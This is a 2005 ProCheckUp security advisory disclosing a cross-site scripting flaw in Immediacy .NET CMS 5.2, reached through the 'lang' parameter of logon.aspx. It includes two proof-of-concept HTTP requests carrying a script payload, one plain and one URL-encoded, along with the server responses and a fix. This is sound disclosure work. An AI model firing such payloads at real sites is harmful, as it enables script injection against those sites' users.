PR05-06: Immediacy .NET CMS possibly vulnerable to Cross Site Scripting
through a malformed cookie

This advisory has been published following consultation with UK NISCC
<http://www.niscc.gov.uk/>

Date found: 2005-02-27

Vulnerable: Immediacy .NET CMS 5.2

Severity: Low

Author: Gemma Hughes [gemma.hughes at procheckup.com]

Vendor Status: CVE Candidate not Assigned

Description:

Immediacy CMS appears to allow Cross Site Scripting attacks via a
malformed 'Set-Cookie:' header. This issue concerns the 'logon.aspx'
program and 'lang' variable. This could allow attackers to cause the
execution of malicious script code within the context of the vulnerable
site.

Note: web browser-specific CRLF injection techniques may be required in
order to exploit this issue.


Information:

REQUEST:

GET
/logon.aspx?lang=<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>
HTTP/1.1
Host: example.host.co.uk
Cookie: ASINFO=...; ASP.NET_SessionId=...; CNBOOK=...;
ASPSESSIONIDSCDAQTST=...
Referer: http://example.host.co.uk:80/environ.pl
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461;
.NET CLR 1.0.3705)
Connection: close


RESULT:

HTTP/1.1 302 Found
Connection: close
Date: Sun, 27 Feb 2005 19:18:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /generalerror.aspx?aspxerrorpath=/logon.aspx
Set-Cookie: lang=<SCRIPT>alert('Can Cross Site Attack')</SCRIPT>;
expires=Mon, 27-Jun-2005 18:18:31 GMT; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 161
Set-Cookie: ASINFO=...
Set-Cookie: CNBOOK=...
Cache-Control: proxy-revalidate

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a
href='/generalerror.aspx?aspxerrorpath=/logon.aspx'>here</a>.</h2>
</body></html>



It is also possible to submit the request using byte-encoded characters:

REQUEST:

GET
/logon.aspx?lang=%3CSCRIPT%3Ealert%28'Can%20Cross%20Site%20Attack'%29%3C%2FSCRIPT%3E&page=272& 

HTTP/1.1
Host: example.host.co.uk
Cookie: ASINFO=...; lang=cy; ASP.NET_SessionId=...; CNBOOK=ClearNet;
ASPSESSIONIDSCDAQTST=...
Referer: http://example.host.co.uk:80/default.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461;
.NET CLR 1.0.3705)
Connection: close

RESULTS:

HTTP/1.1 302 Found
Connection: close
Date: Sun, 27 Feb 2005 19:29:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /generalerror.aspx?aspxerrorpath=/logon.aspx
Set-Cookie: lang=<SCRIPT>alert('Can Cross Site Attack')</SCRIPT>;
expires=Mon, 27-Jun-2005 18:29:27 GMT; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 161
Set-Cookie: ASINFO=...
Set-Cookie: CNBOOK=ClearNet;path=/;domain=.host.co.uk;expires=Fri, 31
Dec 2010 00:00:01 GMT
Cache-Control: proxy-revalidate

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a
href='/generalerror.aspx?aspxerrorpath=/logon.aspx'>here</a>.</h2>
</body></html>


Consequences:

An attacker might cause the execution of malicious script code in the
client (web browser) within the context of the site running the
vulnerable version of Immediacy .NET CMS.

Fix: Contact vendor. Ensure all input is filtered, especially the '<'
and '>' characters.

References:

http://www.procheckup.com/Vulner_PR0506.php
http://www.immediacy.co.uk/

Legal:

Copyright 2005 ProCheckUp Ltd.  All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if the Bulletin is not
changed or edited in any way, is attributed to ProCheckUp, and provided
such reproduction and/or distribution is performed for non-commercial
purposes. Any other use of this
information is prohibited.  ProCheckUp is not liable for any misuse of
this information by any third party.